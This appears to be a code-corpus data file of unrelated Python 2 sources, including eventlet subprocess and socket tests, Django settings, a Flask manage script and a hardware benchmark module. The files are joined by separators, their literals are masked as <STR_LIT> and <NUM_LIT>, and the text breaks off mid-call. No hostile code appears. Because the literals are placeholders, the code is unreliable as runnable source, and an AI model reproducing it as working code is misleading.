unspew = debug.unspew


def named(name):
    """<STR_LIT>"""
    toimport = name
    obj = None
    import_err_strings = []
    # Walk the dotted path right-to-left until some prefix imports.
    while toimport:
        try:
            obj = __import__(toimport)
            break
        except ImportError, err:
            import_err_strings.append(err.__str__())
            toimport = '<STR_LIT:.>'.join(toimport.split('<STR_LIT:.>')[:-<NUM_LIT:1>])
    if obj is None:
        raise ImportError('<STR_LIT>' % (name, import_err_strings))
    # Then walk back down via attribute access to reach the target.
    for seg in name.split('<STR_LIT:.>')[<NUM_LIT:1>:]:
        try:
            obj = getattr(obj, seg)
        except AttributeError:
            dirobj = dir(obj)
            dirobj.sort()
            raise AttributeError('<STR_LIT>' % (
                seg, obj, dirobj, name, import_err_strings))
    return obj
</s>
<s>
# eventlet-friendly wrapper around the stdlib subprocess module (Python 2).
import errno
import new

import eventlet
from eventlet import greenio
from eventlet import patcher
from eventlet.green import os
from eventlet.green import select

# Re-execute the stdlib subprocess module with the green `select`
# injected, so its internal polling cooperates with eventlet.
patcher.inject('<STR_LIT>', globals(), ('<STR_LIT>', select))

subprocess_orig = __import__("<STR_LIT>")


class Popen(subprocess_orig.Popen):
    """<STR_LIT>"""

    if not subprocess_orig.mswindows:
        # On POSIX: force unbuffered pipes in the parent constructor,
        # then wrap each pipe in a GreenPipe honoring the caller's bufsize.
        def __init__(self, args, bufsize=<NUM_LIT:0>, *argss, **kwds):
            subprocess_orig.Popen.__init__(self, args, <NUM_LIT:0>, *argss, **kwds)
            for attr in "<STR_LIT>", "<STR_LIT>", "<STR_LIT>":
                pipe = getattr(self, attr)
                if pipe is not None:
                    wrapped_pipe = greenio.GreenPipe(pipe, pipe.mode, bufsize)
                    setattr(self, attr, wrapped_pipe)
        __init__.__doc__ = subprocess_orig.Popen.__init__.__doc__

    def wait(self, check_interval=<NUM_LIT>):
        # Poll the child instead of blocking, so other greenthreads run
        # while we wait for it to exit.
        try:
            while True:
                status = self.poll()
                if status is not None:
                    return status
                eventlet.sleep(check_interval)
        except OSError, e:
            if e.errno == errno.ECHILD:
                # No child processes: treat as already reaped.
                return -<NUM_LIT:1>
            else:
                raise
    wait.__doc__ = subprocess_orig.Popen.wait.__doc__

    if not subprocess_orig.mswindows:
        # Rebuild the parent's (_)communicate against this module's
        # globals so it picks up the green `select` injected above.
        # The attribute name differs across Python 2.x versions.
        try:
            _communicate = new.function(subprocess_orig.Popen._communicate.im_func.func_code,
                                        globals())
        except AttributeError:
            communicate = new.function(subprocess_orig.Popen.communicate.im_func.func_code,
                                       globals())


# Module-level helpers rebuilt against green globals as well.
call = new.function(subprocess_orig.call.func_code, globals())
try:
    check_call = new.function(subprocess_orig.check_call.func_code, globals())
except AttributeError:
    # Older Pythons lack subprocess.check_call.
    pass
</s>
<s> from py . magic import greenlet <EOL> import sys <EOL> import types <EOL> def emulate ( ) : <EOL> module = types . ModuleType ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = module <EOL> module . greenlet = greenlet <EOL> module . getcurrent = greenlet . getcurrent <EOL> module . GreenletExit = greenlet . GreenletExit </s>
<s> from setuptools import find_packages , setup <EOL> from eventlet import __version__ <EOL> from os import path <EOL> import sys <EOL> requirements = [ ] <EOL> for flag , req in [ ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> if flag in sys . argv : <EOL> sys . argv . remove ( flag ) <EOL> else : <EOL> requirements . append ( req ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = requirements , <EOL> zip_safe = False , <EOL> long_description = open ( <EOL> path . join ( <EOL> path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) . read ( ) , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> ) </s>
<s>
# Run the stdlib SimpleHTTPServer test suite against eventlet's green
# SimpleHTTPServer.
from eventlet import patcher
from eventlet.green import SimpleHTTPServer

# inject() re-imports the named test module with our green module bound
# in place of the stdlib one, exposing its globals (incl. test_main) here.
patcher.inject('<STR_LIT>',
               globals(),
               ('<STR_LIT>', SimpleHTTPServer))

if __name__ == "<STR_LIT:__main__>":
    test_main()
</s>
<s> import unittest <EOL> import socket as _original_sock <EOL> from eventlet import api <EOL> from eventlet . green import socket <EOL> class TestSocketErrors ( unittest . TestCase ) : <EOL> def test_connection_refused ( self ) : <EOL> server = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> server . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> server . listen ( <NUM_LIT:1> ) <EOL> port = server . getsockname ( ) [ <NUM_LIT:1> ] <EOL> server . close ( ) <EOL> del server <EOL> s = socket . socket ( ) <EOL> try : <EOL> s . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except socket . error , ex : <EOL> code , text = ex . args <EOL> assert code in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , ( code , text ) <EOL> assert '<STR_LIT>' in text . lower ( ) , ( code , text ) <EOL> def test_timeout_real_socket ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . test_timeout ( socket = _original_sock ) <EOL> def test_timeout ( self , socket = socket ) : <EOL> """<STR_LIT>""" <EOL> server = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> server . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> server . listen ( <NUM_LIT:1> ) <EOL> port = server . getsockname ( ) [ <NUM_LIT:1> ] <EOL> s = socket . socket ( ) <EOL> s . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> cs , addr = server . accept ( ) <EOL> cs . settimeout ( <NUM_LIT:1> ) <EOL> try : <EOL> try : <EOL> cs . recv ( <NUM_LIT> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except socket . timeout , ex : <EOL> assert hasattr ( ex , '<STR_LIT:args>' ) <EOL> assert len ( ex . args ) == <NUM_LIT:1> <EOL> assert ex . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> finally : <EOL> s . close ( ) <EOL> cs . close ( ) <EOL> server . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s>
# Exception hierarchy for harpoon, rooted at HarpoonError.
from input_algorithms.errors import BadSpec, BadSpecValue
from delfick_error import DelfickError, ProgrammerError


class HarpoonError(DelfickError):
    """Base class for all harpoon errors."""
    pass

# Re-export the spec/programmer errors so callers can import every error
# type from this one module.
BadSpec = BadSpec
BadSpecValue = BadSpecValue
ProgrammerError = ProgrammerError


# Each subclass only customizes `desc`, the DelfickError display prefix.
class BadConfiguration(HarpoonError):
    desc = "<STR_LIT>"

class BadOptionFormat(HarpoonError):
    desc = "<STR_LIT>"

class BadTask(HarpoonError):
    desc = "<STR_LIT>"

class BadOption(HarpoonError):
    desc = "<STR_LIT>"

class NoSuchKey(HarpoonError):
    desc = "<STR_LIT>"

class NoSuchImage(HarpoonError):
    desc = "<STR_LIT>"

class BadCommand(HarpoonError):
    desc = "<STR_LIT>"

class BadImage(HarpoonError):
    desc = "<STR_LIT>"

class CouldntKill(HarpoonError):
    desc = "<STR_LIT>"

class FailedImage(HarpoonError):
    desc = "<STR_LIT>"

class BadYaml(HarpoonError):
    desc = "<STR_LIT>"

class BadResult(HarpoonError):
    desc = "<STR_LIT>"

class UserQuit(HarpoonError):
    desc = "<STR_LIT>"

class BadDockerConnection(HarpoonError):
    desc = "<STR_LIT>"

class ImageDepCycle(HarpoonError):
    desc = "<STR_LIT>"


# These two derive from BadSpecValue (not HarpoonError) so they surface
# as spec-validation failures.
class BadDirectory(BadSpecValue):
    desc = "<STR_LIT>"

class BadFilename(BadSpecValue):
    desc = "<STR_LIT>"

class DeprecatedFeature(BadSpecValue):
    desc = "<STR_LIT>"


class BadEnvironment(HarpoonError):
    desc = "<STR_LIT>"

class BadAmazon(HarpoonError):
    desc = "<STR_LIT>"
</s>
<s> from django . conf . urls import patterns , url <EOL> from polls import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . ResultsView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . vote , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> MIDDLEWARE_CLASSES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> AUTH_PASSWORD_VALIDATORS = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> ] <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' <EOL> TEST_RUNNER = '<STR_LIT>' <EOL> NUM_SLOW_TESTS = <NUM_LIT:5> </s>
<s> import os <EOL> import unittest <EOL> import coverage <EOL> from flask . ext . script import Manager <EOL> from flask . ext . migrate import Migrate , MigrateCommand <EOL> COV = coverage . coverage ( <EOL> branch = True , <EOL> include = '<STR_LIT>' , <EOL> omit = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> COV . start ( ) <EOL> from project . server import app , db <EOL> from project . server . models import User <EOL> migrate = Migrate ( app , db ) <EOL> manager = Manager ( app ) <EOL> manager . add_command ( '<STR_LIT>' , MigrateCommand ) <EOL> @ manager . command <EOL> def test ( ) : <EOL> """<STR_LIT>""" <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' , pattern = '<STR_LIT>' ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if result . wasSuccessful ( ) : <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> @ manager . command <EOL> def cov ( ) : <EOL> """<STR_LIT>""" <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if result . wasSuccessful ( ) : <EOL> COV . stop ( ) <EOL> COV . save ( ) <EOL> print ( '<STR_LIT>' ) <EOL> COV . report ( ) <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> covdir = os . path . join ( basedir , '<STR_LIT>' ) <EOL> COV . html_report ( directory = covdir ) <EOL> print ( '<STR_LIT>' % covdir ) <EOL> COV . erase ( ) <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> @ manager . command <EOL> def create_db ( ) : <EOL> """<STR_LIT>""" <EOL> db . create_all ( ) <EOL> @ manager . command <EOL> def drop_db ( ) : <EOL> """<STR_LIT>""" <EOL> db . drop_all ( ) <EOL> @ manager . command <EOL> def create_admin ( ) : <EOL> """<STR_LIT>""" <EOL> db . session . add ( User ( email = '<STR_LIT>' , password = '<STR_LIT>' , admin = True ) ) <EOL> db . session . commit ( ) <EOL> @ manager . 
command <EOL> def create_data ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import sys <EOL> from . PatchImporter import PatchImporter <EOL> import wrapt <EOL> from . log import * <EOL> from recipyCommon . utils import * <EOL> from recipyCommon . config import option_set <EOL> class PatchSimple ( PatchImporter ) : <EOL> """<STR_LIT>""" <EOL> def patch ( self , mod ) : <EOL> """<STR_LIT>""" <EOL> if not self . _ignore_input ( ) : <EOL> for f in self . input_functions : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % f ) <EOL> patch_function ( mod , f , self . input_wrapper ) <EOL> else : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % self . modulename ) <EOL> if not self . _ignore_output ( ) : <EOL> for f in self . output_functions : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % f ) <EOL> patch_function ( mod , f , self . output_wrapper ) <EOL> else : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % self . modulename ) <EOL> return mod <EOL> def _ignore_input ( self ) : <EOL> root_modulename = self . modulename . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> return option_set ( '<STR_LIT>' , root_modulename ) or option_set ( '<STR_LIT>' , '<STR_LIT:all>' ) <EOL> def _ignore_output ( self ) : <EOL> root_modulename = self . modulename . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> return option_set ( '<STR_LIT>' , root_modulename ) or option_set ( '<STR_LIT>' , '<STR_LIT:all>' ) </s>
<s> """<STR_LIT>""" <EOL> from concurrent import futures <EOL> from gevent . pool import Pool <EOL> import gevent <EOL> from . tasks import Task , MultiTask <EOL> class GeventPoolExecutor ( futures . Executor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , max_workers ) : <EOL> self . max_workers = max_workers <EOL> self . _pool = Pool ( max_workers ) <EOL> def submit ( self , fn , * args , ** kwargs ) : <EOL> greenlet = self . _pool . spawn ( fn , * args , ** kwargs ) <EOL> return GeventFuture ( greenlet ) <EOL> def shutdown ( self , wait = True ) : <EOL> self . _pool . kill ( block = wait ) <EOL> class GeventFuture ( futures . Future ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , greenlet ) : <EOL> super ( GeventFuture , self ) . __init__ ( ) <EOL> self . _greenlet = greenlet <EOL> def result ( self , timeout = None ) : <EOL> try : <EOL> return self . _greenlet . get ( timeout = timeout ) <EOL> except gevent . Timeout as e : <EOL> raise futures . TimeoutError ( e ) <EOL> def exception ( self , timeout = None ) : <EOL> return self . _greenlet . exception <EOL> def running ( self ) : <EOL> return not self . done ( ) <EOL> def done ( self ) : <EOL> return self . _greenlet . ready ( ) <EOL> class GTask ( Task ) : <EOL> """<STR_LIT>""" <EOL> executor_class = GeventPoolExecutor <EOL> class MultiGTask ( MultiTask ) : <EOL> """<STR_LIT>""" <EOL> executor_class = GeventPoolExecutor <EOL> def wait ( self , executor , spawned_futures , timeout = None ) : <EOL> executor . _pool . join ( timeout ) <EOL> return all ( f . done ( ) for f in spawned_futures ) </s>
<s> """<STR_LIT>""" <EOL> from . base import BaseCache <EOL> from . storage . redisdict import RedisDict <EOL> class RedisCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , namespace = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> super ( RedisCache , self ) . __init__ ( ** options ) <EOL> self . responses = RedisDict ( namespace , '<STR_LIT>' , <EOL> options . get ( '<STR_LIT>' ) ) <EOL> self . keys_map = RedisDict ( namespace , '<STR_LIT>' , self . responses . connection ) </s>
<s> import recurly <EOL> from recurly import Account , Transaction , ValidationError <EOL> from recurlytests import RecurlyTest <EOL> class RecurlyExceptionTests ( RecurlyTest ) : <EOL> def test_error_printable ( self ) : <EOL> """<STR_LIT>""" <EOL> str ( recurly . UnauthorizedError ( '<STR_LIT>' ) ) <EOL> def test_validationerror_printable ( self ) : <EOL> """<STR_LIT>""" <EOL> error = recurly . ValidationError . Suberror ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:message>' ) <EOL> suberrors = dict ( ) <EOL> suberrors [ '<STR_LIT>' ] = error <EOL> validation_error = recurly . ValidationError ( '<STR_LIT>' ) <EOL> validation_error . __dict__ [ '<STR_LIT>' ] = suberrors <EOL> str ( validation_error ) <EOL> def test_transaction_error_code_property ( self ) : <EOL> """<STR_LIT>""" <EOL> transaction = Transaction ( <EOL> amount_in_cents = <NUM_LIT:1000> , <EOL> currency = '<STR_LIT>' , <EOL> account = Account ( <EOL> account_code = '<STR_LIT>' <EOL> ) <EOL> ) <EOL> with self . mock_request ( '<STR_LIT>' ) : <EOL> try : <EOL> transaction . save ( ) <EOL> except ValidationError as e : <EOL> error = e <EOL> self . assertEqual ( error . transaction_error_code , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import collections <EOL> import ConfigParser <EOL> NoDefault = object ( ) <EOL> SECTIONS = collections . OrderedDict ( ) <EOL> class attrdict ( dict ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> dict . __init__ ( self , * args , ** kwargs ) <EOL> self . __dict__ = self <EOL> class ConfigurationError ( Exception ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , section , name , message ) : <EOL> self . section = section <EOL> self . name = name <EOL> self . message = message <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . section , <EOL> self . name , <EOL> self . message ) <EOL> def boolean ( input ) : <EOL> """<STR_LIT>""" <EOL> if input . lower ( ) in ( "<STR_LIT:true>" , "<STR_LIT>" ) : <EOL> return True <EOL> elif input . lower ( ) in ( "<STR_LIT:false>" , "<STR_LIT>" ) : <EOL> return False <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % input ) <EOL> class Option ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , convert , default = NoDefault , validator = None ) : <EOL> self . convert = convert <EOL> self . default = default <EOL> self . validator = validator <EOL> def _make_extractor ( cls , prefix = "<STR_LIT>" , required = True ) : <EOL> section_name = cls . __name__ [ : - len ( "<STR_LIT>" ) ] . lower ( ) <EOL> if prefix : <EOL> section_name = prefix + "<STR_LIT::>" + section_name <EOL> def config_extractor ( parser ) : <EOL> section = attrdict ( ) <EOL> for name , option_def in vars ( cls ) . iteritems ( ) : <EOL> if not isinstance ( option_def , Option ) : <EOL> continue <EOL> try : <EOL> value = parser . get ( section_name , name ) <EOL> except ( ConfigParser . NoSectionError , ConfigParser . NoOptionError ) : <EOL> if option_def . default is NoDefault : <EOL> raise ConfigurationError ( section_name , name , <EOL> "<STR_LIT>" ) <EOL> value = option_def . default <EOL> else : <EOL> try : <EOL> value = option_def . 
convert ( value ) <EOL> except Exception , e : <EOL> raise ConfigurationError ( section_name , name , e ) <EOL> section [ name ] = value <EOL> return section <EOL> config_extractor . required = required <EOL> config_extractor . prefix = prefix <EOL> SECTIONS [ section_name ] = config_extractor <EOL> def config_section ( * args , ** kwargs ) : <EOL> if len ( args ) == <NUM_LIT:1> and not kwargs : <EOL> return _make_extractor ( args [ <NUM_LIT:0> ] ) <EOL> def config_decorator ( cls ) : <EOL> return _make_extractor ( cls , ** kwargs ) <EOL> return config_decorator <EOL> @ config_section <EOL> class SshConfig ( object ) : <EOL> user = Option ( str ) <EOL> key_filename = Option ( str , default = None ) <EOL> strict_host_key_checking = Option ( boolean , default = True ) <EOL> timeout = Option ( int , default = <NUM_LIT:30> ) <EOL> @ config_section <EOL> class DeployConfig ( object ) : <EOL> build_host = Option ( str ) <EOL> deploy_binary = Option ( str ) <EOL> build_binary = Option ( str ) <EOL> @ config_section <EOL> class PathsConfig ( object ) : <EOL> log_root = Option ( str ) <EOL> wordlist = Option ( str , default = "<STR_LIT>" ) <EOL> @ config_section <EOL> class SyslogConfig ( object ) : <EOL> def syslog_enum ( value ) : <EOL> import syslog <EOL> value = "<STR_LIT>" + value <EOL> return getattr ( syslog , value ) <EOL> ident = Option ( str , default = "<STR_LIT>" ) <EOL> facility = Option ( syslog_enum ) <EOL> priority = Option ( syslog_enum ) <EOL> @ config_section <EOL> class HostsConfig ( object ) : <EOL> def valid_host_source ( value ) : <EOL> try : <EOL> section = SECTIONS [ "<STR_LIT>" + value ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % value ) <EOL> section . 
required = True <EOL> return value <EOL> source = Option ( valid_host_source ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class DnsConfig ( object ) : <EOL> domain = Option ( str ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class MockConfig ( object ) : <EOL> host_count = Option ( int ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class ZooKeeperConfig ( object ) : <EOL> connection_string = Option ( str ) <EOL> username = Option ( str ) <EOL> password = Option ( str ) <EOL> @ config_section <EOL> class DefaultsConfig ( object ) : <EOL> sleeptime = Option ( int , default = <NUM_LIT:0> ) <EOL> shuffle = Option ( boolean , default = False ) <EOL> def alias_parser ( parser ) : <EOL> aliases = { } <EOL> if parser . has_section ( "<STR_LIT>" ) : <EOL> for key , value in parser . items ( "<STR_LIT>" ) : <EOL> aliases [ key ] = [ glob . strip ( ) for glob in value . split ( '<STR_LIT:U+0020>' ) ] <EOL> return aliases <EOL> SECTIONS [ "<STR_LIT>" ] = alias_parser <EOL> def default_ref_parser ( parser ) : <EOL> default_refs = { } <EOL> if parser . has_section ( "<STR_LIT>" ) : <EOL> default_refs . update ( parser . items ( "<STR_LIT>" ) ) <EOL> return default_refs <EOL> SECTIONS [ "<STR_LIT>" ] = default_ref_parser <EOL> def parse_config ( ) : <EOL> """<STR_LIT>""" <EOL> parser = ConfigParser . RawConfigParser ( ) <EOL> parser . read ( [ "<STR_LIT>" , os . path . expanduser ( "<STR_LIT>" ) ] ) <EOL> config = attrdict ( ) <EOL> for name , section_parser in SECTIONS . iteritems ( ) : <EOL> is_required = getattr ( section_parser , "<STR_LIT>" , True ) <EOL> if is_required or parser . has_section ( name ) : <EOL> prefix = getattr ( section_parser , "<STR_LIT>" , None ) <EOL> parsed = section_parser ( parser ) <EOL> if not prefix : <EOL> config [ name ] = parsed <EOL> else : <EOL> unprefixed = name [ len ( prefix ) + <NUM_LIT:1> : ] <EOL> config . 
setdefault ( prefix , attrdict ( ) ) [ unprefixed ] = parsed <EOL> return config </s>
<s> from health_messages import Health_Message as HM <EOL> import health_protocol as HP <EOL> import ipaddr <EOL> import psutil <EOL> import sys <EOL> import subprocess <EOL> from hardware import matcher <EOL> import re <EOL> from commands import getstatusoutput as cmd <EOL> import threading <EOL> from sets import Set <EOL> import os <EOL> def is_in_network ( left , right ) : <EOL> '<STR_LIT>' <EOL> return ipaddr . IPv4Address ( left ) in ipaddr . IPv4Network ( right ) <EOL> def get_multiple_values ( hw , level1 , level2 , level3 ) : <EOL> result = [ ] <EOL> temp_level2 = level2 <EOL> for entry in hw : <EOL> if level2 == '<STR_LIT:*>' : <EOL> temp_level2 = entry [ <NUM_LIT:1> ] <EOL> if ( level1 == entry [ <NUM_LIT:0> ] and temp_level2 == entry [ <NUM_LIT:1> ] and level3 == entry [ <NUM_LIT:2> ] ) : <EOL> result . append ( entry [ <NUM_LIT:3> ] ) <EOL> return result <EOL> def get_value ( hw_ , level1 , level2 , level3 ) : <EOL> for entry in hw_ : <EOL> if ( level1 == entry [ <NUM_LIT:0> ] and level2 == entry [ <NUM_LIT:1> ] and level3 == entry [ <NUM_LIT:2> ] ) : <EOL> return entry [ <NUM_LIT:3> ] <EOL> return None <EOL> def fatal_error ( error ) : <EOL> '''<STR_LIT>''' <EOL> HP . logger . error ( '<STR_LIT>' % error ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def run_sysbench_cpu ( hw_ , max_time , cpu_count , processor_num = - <NUM_LIT:1> ) : <EOL> '<STR_LIT>' <EOL> taskset = '<STR_LIT>' <EOL> if ( processor_num < <NUM_LIT:0> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( max_time , cpu_count ) ) <EOL> else : <EOL> sys . stderr . write ( '<STR_LIT>' % <EOL> ( processor_num , max_time , cpu_count ) ) <EOL> taskset = '<STR_LIT>' % hex ( <NUM_LIT:1> << processor_num ) <EOL> cmds = '<STR_LIT>' '<STR_LIT>' % ( taskset , max_time , cpu_count ) <EOL> sysbench_cmd = subprocess . Popen ( cmds , shell = True , stdout = subprocess . PIPE ) <EOL> for line in sysbench_cmd . stdout : <EOL> if "<STR_LIT>" in line . decode ( ) : <EOL> title , perf = line . 
decode ( ) . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT::>' ) <EOL> if processor_num == - <NUM_LIT:1> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> str ( int ( perf ) / max_time ) ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' % processor_num , <EOL> '<STR_LIT>' , str ( int ( perf ) / max_time ) ) ) <EOL> def get_available_memory ( ) : <EOL> try : <EOL> return psutil . virtual_memory ( ) . total <EOL> except Exception : <EOL> return psutil . avail_phymem ( ) <EOL> def check_mem_size ( block_size , cpu_count ) : <EOL> dsplit = re . compile ( r'<STR_LIT>' ) <EOL> ssplit = re . compile ( r'<STR_LIT>' ) <EOL> unit = ssplit . findall ( block_size ) <EOL> unit_in_bytes = <NUM_LIT:1> <EOL> if unit [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> unit_in_bytes = <NUM_LIT> <EOL> elif unit [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> unit_in_bytes = <NUM_LIT> * <NUM_LIT> <EOL> elif unit [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> unit_in_bytes = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> size_in_bytes = unit_in_bytes * int ( dsplit . findall ( block_size ) [ <NUM_LIT:0> ] ) * cpu_count <EOL> if ( size_in_bytes > get_available_memory ( ) ) : <EOL> return False <EOL> return True <EOL> def stop_netservers ( message ) : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> status , output = cmd ( '<STR_LIT>' ) <EOL> def start_bench_server ( message , port_number ) : <EOL> sys . stderr . write ( '<STR_LIT>' % ( message . my_peer_name , port_number ) ) <EOL> status , output = cmd ( '<STR_LIT>' % port_number ) <EOL> def get_my_ip_port ( message ) : <EOL> return get_ip_port ( message , message . my_peer_name ) <EOL> def get_ip_port ( message , ip ) : <EOL> port_number = <NUM_LIT:0> <EOL> for host in message . peer_servers : <EOL> if host [ <NUM_LIT:1> ] == ip : <EOL> port_number = message . 
ports_list [ host [ <NUM_LIT:0> ] ] <EOL> break <EOL> return port_number <EOL> def start_netservers ( message ) : <EOL> threads = { } <EOL> sys . stderr . write ( '<STR_LIT>' % ( len ( message . peer_servers ) - <NUM_LIT:1> ) ) <EOL> for server in message . peer_servers : <EOL> if message . my_peer_name != server [ <NUM_LIT:1> ] : <EOL> port_number = get_ip_port ( message , server [ <NUM_LIT:1> ] ) <EOL> sys . stderr . write ( "<STR_LIT>" % ( message . my_peer_name , port_number , server [ <NUM_LIT:1> ] ) ) <EOL> threads [ port_number ] = threading . Thread ( target = start_bench_server , args = tuple ( [ message , port_number ] ) ) <EOL> threads [ port_number ] . start ( ) <EOL> def add_netperf_suboption ( sub_options , value ) : <EOL> if len ( sub_options ) == <NUM_LIT:0> : <EOL> sub_options = "<STR_LIT>" <EOL> return "<STR_LIT>" % ( sub_options , value ) <EOL> def start_bench_client ( ip , port , message ) : <EOL> netperf_mode = "<STR_LIT>" <EOL> unit = "<STR_LIT>" <EOL> sub_options = "<STR_LIT>" <EOL> if message . network_test == HM . BANDWIDTH : <EOL> netperf_mode = "<STR_LIT>" <EOL> unit = "<STR_LIT>" <EOL> if message . block_size != "<STR_LIT:0>" : <EOL> sub_options = add_netperf_suboption ( 